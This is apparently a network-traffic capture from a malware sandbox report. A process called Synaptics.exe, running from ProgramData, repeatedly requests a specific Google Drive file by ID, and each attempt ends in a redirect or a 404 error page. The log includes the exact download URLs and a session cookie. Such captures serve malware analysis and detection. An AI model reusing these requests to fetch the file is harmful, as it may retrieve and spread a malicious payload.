                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:48 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-Let5wgjCNHdyJlORqjG3bw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      64192.168.2.1149993172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:49 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:49 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:49 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-uUdgpHTQdWOTLKi-ZtekjA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      65192.168.2.1149994142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:49 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:49 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC45Il4GCSjEZv_NmyOjz94b8tzFKZutokNLBWNlknnfhAk1YUAKdGVj15exIK7GdmZxjkkXlqw
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:49 GMT
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-f0ZCDQSXsFTEfjEEBHttUg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:49 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                      2024-12-30 10:25:49 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 70 73 7a 75 52 46 46 71 31 79 44 64 62 4d 5f 36 69 36 4b 4c 55 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="pszuRFFq1yDdbM_6i6KLUQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                      2024-12-30 10:25:49 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      66192.168.2.1150001172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:49 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:50 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:49 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-fogthQojF7QeIrPurbLYRA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      67192.168.2.1150002142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:49 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:50 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC4lhRc7kI1H-7ND--89oA0PHovE6MFe6SeLvsYQdfyn_-s8bUHnYVukT5nYAx2Umc9f
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:49 GMT
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-AtBr2WPl96avxnZ9M590Yg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:50 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                      2024-12-30 10:25:50 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5a 41 6b 37 39 4e 67 6f 6b 59 68 45 7a 73 38 34 4e 42 62 77 62 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="ZAk79NgokYhEzs84NBbwbw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                      2024-12-30 10:25:50 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      68192.168.2.1150005172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:49 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:50 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:50 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-JJFSOvEM9w08pXuZiLrdBg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      69192.168.2.1150008142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:50 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:50 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC7B8J-w27zhAm1ALhObn4luC2q2_rzR_PqIJGMakPB1xSoKPjMSFeIjZT-oMerVwKHMqXFQt5o
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:50 GMT
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-miCajQDKrthPwyws8g76ow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:50 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                      2024-12-30 10:25:50 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5a 39 67 4a 54 34 6c 33 53 57 4e 4a 35 70 77 56 67 48 6e 6c 48 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="Z9gJT4l3SWNJ5pwVgHnlHw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                      2024-12-30 10:25:50 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      70192.168.2.1150012172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:50 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      71192.168.2.1150016142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:50 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
